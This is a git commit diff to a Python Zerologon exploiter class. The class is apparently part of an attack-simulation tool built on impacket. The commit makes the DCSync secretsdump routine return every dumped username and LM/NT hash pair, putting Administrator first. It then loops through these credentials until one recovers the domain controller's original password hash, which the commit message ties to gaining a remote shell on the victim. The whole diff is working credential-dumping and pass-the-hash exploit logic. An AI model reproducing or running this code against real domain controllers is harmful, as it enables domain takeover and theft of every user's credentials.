Try starting remote shell on victim with all user creds until successful
This commit is contained in:
parent
c227ccd3a1
commit
2ef892e33f
|
@ -7,7 +7,7 @@ import logging
|
|||
import os
|
||||
import re
|
||||
from binascii import unhexlify
|
||||
from typing import Dict, List, Optional
|
||||
from typing import Dict, List, Optional, Tuple
|
||||
|
||||
import impacket
|
||||
import nmb.NetBIOS
|
||||
|
@ -206,17 +206,25 @@ class ZerologonExploiter(HostExploiter):
|
|||
try:
|
||||
rpc_con = None
|
||||
|
||||
# DCSync to get some username and its password's hashes.
|
||||
LOG.debug("DCSync; getting some username and its password's hashes.")
|
||||
user_details = self.get_user_details()
|
||||
if not user_details:
|
||||
raise Exception("Couldn't extract username and/or its password's hashes.")
|
||||
# DCSync to get usernames and their passwords' hashes.
|
||||
LOG.debug("DCSync; getting usernames and their passwords' hashes.")
|
||||
user_creds = self.get_all_user_creds()
|
||||
if not user_creds:
|
||||
raise Exception("Couldn't extract any usernames and/or their passwords' hashes.")
|
||||
|
||||
# Use above extracted credentials to get original DC password's hashes.
|
||||
LOG.debug("Getting original DC password's NT hash.")
|
||||
original_pwd_nthash = None
|
||||
for user_details in user_creds:
|
||||
username = user_details[0]
|
||||
user_pwd_hashes = [user_details[1]['lm_hash'], user_details[1]['nt_hash']]
|
||||
try:
|
||||
original_pwd_nthash = self.get_original_pwd_nthash(username, ':'.join(user_pwd_hashes))
|
||||
if original_pwd_nthash:
|
||||
break
|
||||
except Exception as e:
|
||||
LOG.info(f"Credentials \"{user_details}\" didn't work. Exception: {str(e)}")
|
||||
|
||||
if not original_pwd_nthash:
|
||||
raise Exception("Couldn't extract original DC password's NT hash.")
|
||||
|
||||
|
@ -243,7 +251,7 @@ class ZerologonExploiter(HostExploiter):
|
|||
if rpc_con:
|
||||
rpc_con.disconnect()
|
||||
|
||||
def get_user_details(self) -> (str, Dict):
|
||||
def get_all_user_creds(self) -> List[Tuple[str, Dict]]:
|
||||
try:
|
||||
options = OptionsForSecretsdump(
|
||||
target=f"{self.dc_name}$@{self.dc_ip}", # format for DC account - "NetBIOSName$@0.0.0.0"
|
||||
|
@ -257,13 +265,15 @@ class ZerologonExploiter(HostExploiter):
|
|||
|
||||
self._extract_user_creds_from_secrets(dumped_secrets=dumped_secrets)
|
||||
|
||||
creds_to_use_for_getting_original_pwd_hashes = []
|
||||
admin = 'Administrator'
|
||||
if admin in self._extracted_creds:
|
||||
return admin, self._extracted_creds[admin]
|
||||
else:
|
||||
for user in self._extracted_creds.keys():
|
||||
if self._extracted_creds[user]['RID'] >= 1000: # will only be able to log in with user accounts
|
||||
return user, self._extracted_creds[user]
|
||||
if user == admin: # most likely to work so try this first
|
||||
creds_to_use_for_getting_original_pwd_hashes.insert(0, (user, self._extracted_creds[user]))
|
||||
else:
|
||||
creds_to_use_for_getting_original_pwd_hashes.append((user, self._extracted_creds[user]))
|
||||
|
||||
return creds_to_use_for_getting_original_pwd_hashes
|
||||
|
||||
except Exception as e:
|
||||
LOG.info(f"Exception occurred while dumping secrets to get some username and its password's NT hash: {str(e)}")
|
||||
|
|
Loading…
Reference in New Issue